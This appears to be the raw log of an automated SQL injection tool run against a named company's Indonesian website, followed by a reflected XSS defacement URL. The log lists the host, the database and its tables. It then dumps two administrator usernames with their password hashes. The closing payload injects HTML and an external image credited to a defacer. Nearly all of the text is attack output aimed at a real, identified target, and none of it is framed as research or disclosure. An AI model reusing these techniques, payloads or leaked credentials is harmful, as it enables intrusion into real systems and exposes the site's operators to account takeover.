Analyzing http://www.bayer.co.id/ina/cs_cp_crops.php?g_id=7
Host IP: 64.13.232.173
Web Server: Apache/2.0.54
Powered-by: PHP/4.4.9
Keyword Found: Bayer.co.id
Injection type is Integer
DB Server: MySQL
Trying another method using keyword for finding columns count
Findig columns count for MySQL failed!
Current DB: db42963_odniwebbay
MySQL error based injection method can be used!
Data Base Found: information_schema
Data Base Found: db42963_odniwebbay
Count(table_name) of information_schema.tables where table_schema=0x646234323936335F6F646E69776562626179 is 40
Can not get all tables by group_concat!
Count(table_name) of information_schema.tables where table_schema=0x646234323936335F6F646E69776562626179 is 40
Table found: tb_coverage
Table found: tb_crops
Table found: tb_cropscrops
Table found: tb_cropscropsgroup
Table found: tb_cropspproblem
Table found: tb_cropsproblemgroup
Table found: tb_cropsproduct
Table found: tb_cropsproductgroup
Table found: tb_cropsrecommendation
Table found: tb_esproblem
Table found: tb_esproduct
Table found: tb_esproductgroup
Table found: tb_event
Table found: tb_eventglobal
Table found: tb_forum
Table found: tb_gbfile
Table found: tb_member
Table found: tb_microsite
Table found: tb_msds
Table found: tb_msdscat
Table found: tb_msdsparam
Table found: tb_news
Table found: tb_newscat
Table found: tb_newsmicro
Table found: tb_newsmicrocat
Table found: tb_newsstatus
Table found: tb_product
Table found: tb_productcat
Table found: tb_productdetail
Table found: tb_productfaq
Table found: tb_productgroup
Table found: tb_productpage
Table found: tb_productstatus
Table found: tb_publication
Table found: tb_publicationcat
Table found: tb_publicationstatus
Table found: tb_recommendation
Table found: tb_status
Table found: test
Table found: user
Count(column_name) of information_schema.columns where table_schema=0x646234323936335F6F646E69776562626179 and table_name=0x75736572 is 7
Column found: id
Column found: nama
Column found: username
Column found: password
Column found: group
Column found: barui
Column found: masuk
Count(*) of db42963_odniwebbay.user is 2
Data Found: =
Data Found: id=5
Data Found: nama=
Data Found: username=thinkweb
Data Found: password=35662a57ac016ee4347f69f9de647f64
Data Found: group=1
Data Found: id=7
Data Found: nama=
Data Found: username=adminbayerweb
Data Found: password=e417e24a7611b74ba3057fa945c0bde8
Data Found: group=0
XSS Vulnerability
Code:
http://www.bayer.co.id/ina/cs_cp_crops.php?g_id=%3Ctitle%3EXSSed+by+RahZEROV%3C%2Ftitle%3E%3Ch1%3E%3C%2Fh1%3E%3Ch1%3E%3Cbr%3E%3Cbr%3E%3Ccenter%3EXSSed+by%3C%2Fcenter%3E%3Cbr%3E%3Cbr%3E%3Ccenter%3E%3Cb%3ERahZEROV%3C%2Fb%3E%3C%2Fcenter%3E%3C%2Fh1%3E%3Cstyle%3E+html+{%20background-image:%20url%28http://www.cyber4rt.com/logo.gif%29;}